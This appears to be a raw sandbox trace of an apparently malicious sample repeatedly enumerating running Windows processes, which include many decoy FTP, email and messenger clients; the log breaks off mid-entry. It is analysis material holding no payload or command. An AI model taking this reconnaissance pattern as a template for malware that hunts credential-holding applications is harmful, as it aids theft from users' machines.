1 [0258.900] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0258.905] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0258.906] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0258.908] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0258.909] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0258.911] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0258.912] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0258.914] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0258.915] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0258.920] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0258.921] CloseHandle (hObject=0x1d14) returned 1 [0258.921] Sleep (dwMilliseconds=0x64) [0259.057] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0259.070] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.072] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0259.076] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0259.078] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.080] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0259.081] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.083] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0259.084] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0259.086] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0259.087] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.088] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.092] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0259.094] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.095] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.096] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.098] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.099] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.101] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.102] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.104] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0259.127] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0259.129] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0259.130] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.131] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.133] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0259.134] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0259.136] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0259.137] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0259.138] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.140] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0259.141] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0259.143] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0259.144] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0259.145] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0259.147] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0259.148] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0259.150] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0259.151] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0259.153] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0259.154] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0259.155] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0259.157] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0259.158] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0259.159] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0259.161] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0259.162] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0259.164] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0259.165] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0259.216] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0259.218] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0259.219] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0259.220] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0259.222] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0259.223] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0259.225] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0259.226] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0259.227] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0259.229] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0259.231] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0259.232] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0259.234] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0259.236] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0259.237] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0259.239] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0259.241] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0259.242] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0259.244] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0259.246] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0259.247] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0259.249] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0259.250] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0259.252] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0259.254] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0259.255] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, 